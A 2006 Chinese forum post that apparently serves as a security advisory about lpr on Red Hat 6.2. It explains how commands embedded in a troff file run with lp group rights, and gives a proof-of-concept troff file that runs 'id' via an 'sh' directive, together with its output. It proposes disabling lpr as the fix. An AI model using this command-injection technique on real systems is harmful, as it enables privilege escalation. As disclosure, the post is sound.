|
- UID
- 2382
- 帖子
- 728
- 积分
- 4061
- 金币
- 2460 枚
- 宝物
- 143 个
- 荣誉
- 93 点
- 喜欢
- 1
- 来自
- 陕西
  
|
1#
发表于 2006-11-10 15:58
| 只看该作者
lpr.exe 用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务器。
lpr是UNIX的打印工具,在REDHAT 6.2中lpr存在漏洞允许以lp的组身份执行任意
命令。漏洞问题是在处理troff文件,他们转化为postscript时候产生的。当处理
时,嵌在troff文件里面的命令可以被执行,这个导致lpr配置文件破坏。
测试代码
[zen@continuity /tmp]$ cat asdf
PS
sh D/usr/bin/id>/tmp/yougetanyideasyetD
.PF
[zen@continuity /tmp]$ lpr asdf
[zen@continuity /tmp]$ cat /tmp/yougetanyideasyet
uid=500(zen) gid=500(zen) groups=7(lp)
解决方案
暂时关闭lpr程序。 |
|
